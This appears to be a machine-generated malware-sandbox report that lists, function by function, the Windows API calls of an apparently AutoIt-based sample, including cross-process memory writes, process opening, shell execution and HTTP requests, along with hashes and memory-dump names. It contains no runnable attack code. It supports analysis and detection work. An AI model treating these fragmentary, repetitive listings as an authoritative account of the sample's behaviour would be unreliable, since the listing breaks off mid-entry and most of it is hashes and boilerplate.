                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 708495834-557222456
                                          • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                          • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                          • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                          • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                          APIs
                                            • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                            • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                            • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                            • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                            • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                          • String ID: @
                                          • API String ID: 4150878124-2766056989
                                          • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                          • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                          • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                          • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: \$]$h
                                          • API String ID: 4104443479-3262404753
                                          • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                          • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                          • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                          • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                          APIs
                                          • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                          • CloseHandle.KERNEL32(?), ref: 00457E09
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                          • String ID: <$@
                                          • API String ID: 2417854910-1426351568
                                          • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                          • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                          • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                          • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                          APIs
                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                            • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                          • String ID:
                                          • API String ID: 3705125965-3916222277
                                          • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                          • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                          • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                          • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                          APIs
                                          • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                          • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                          • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$Delete$InfoItem
                                          • String ID: 0
                                          • API String ID: 135850232-4108050209
                                          • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                          • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                          • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                          • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Window$Long
                                          • String ID: SysTreeView32
                                          • API String ID: 847901565-1698111956
                                          • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                          • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                          • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                          • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                          APIs
                                          • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                          • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                          • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Library$AddressFreeLoadProc
                                          • String ID: AU3_GetPluginDetails
                                          • API String ID: 145871493-4132174516
                                          • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                          • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                          • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                          • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                          APIs
                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: SysMonthCal32
                                          • API String ID: 2326795674-1439706946
                                          • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                          • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                          • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                          • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00450A2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: DestroyWindow
                                          • String ID: msctls_updown32
                                          • API String ID: 3375834691-2298589950
                                          • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                          • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                          • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                          • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: $<
                                          • API String ID: 4104443479-428540627
                                          • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                          • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                          • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                          • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID: \VH
                                          • API String ID: 1682464887-234962358
                                          • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                          • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                          • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                          • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID: \VH
                                          • API String ID: 1682464887-234962358
                                          • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                          • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                          • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                          • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DiskFreeSpace
                                          • String ID: \VH
                                          • API String ID: 1682464887-234962358
                                          • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                          • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                          • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                          • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume
                                          • String ID: \VH
                                          • API String ID: 2507767853-234962358
                                          • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                          • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                          • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                          • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ErrorMode$InformationVolume
                                          • String ID: \VH
                                          • API String ID: 2507767853-234962358
                                          • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                          • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                          • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                          • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                          APIs
                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
